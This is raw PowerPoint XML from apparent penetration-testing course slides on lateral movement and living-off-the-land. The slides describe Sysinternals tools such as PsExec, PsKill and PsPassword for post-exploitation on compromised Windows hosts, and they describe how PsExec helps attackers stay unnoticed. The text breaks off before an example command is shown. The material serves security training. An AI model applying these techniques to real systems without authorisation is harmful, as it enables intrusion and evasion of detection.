    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19569073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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10359F8A-B56A-3EB2-6C83-FB7410B44542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2311" y="1088571"/>
            <a:ext cx="9021277"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err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PsExec</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> is a suite of tools that allows administrators to control Windows-based computers from a remote terminal. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>You can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> to upload, execute, and interact with executables on compromised hosts. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The entire suite works from a command-line interface and can be scripted. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>By using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, you can run commands that can reveal information about running processes, and you can kill or stop services. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Penetration testers commonly use the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> tools post-exploitation:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PsExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Executes processes                                            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PsPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Changes passwords</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PsFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Shows open files                                                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PsPing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Starts ping requests    </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PsInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Gives detailed information about a computer       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PsService</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Makes changes to Windows services</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PsKill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Kills processes        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>                                               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PsShutdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Shuts down a computer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PsList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Lists information about processes                         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PsSuspend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Suspends processes                     </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PsLoggedOn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Lists logged-in accounts                           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PsLogList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Pulls event logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>PSGetSid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>: Displays security identifiers of users</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dirty="0"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33594585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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10359F8A-B56A-3EB2-6C83-FB7410B44542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2311" y="1088571"/>
            <a:ext cx="9021277"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400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PsExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> is one of the most powerful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> tools. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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You can use it to remotely execute anything that can run on a Windows command prompt. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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You can also use it to modify Windows registry values, execute scripts, and connect a compromised system to another system. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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For attackers, one advantage of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PsExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> is that the output of the commands you execute is shown on your system (the local system) instead of on the victim’s system. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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This allows an attacker to remain undetected by remote users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>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Because of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> option, the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PsExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> command interacts with the compromised system to launch the calculator application, and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
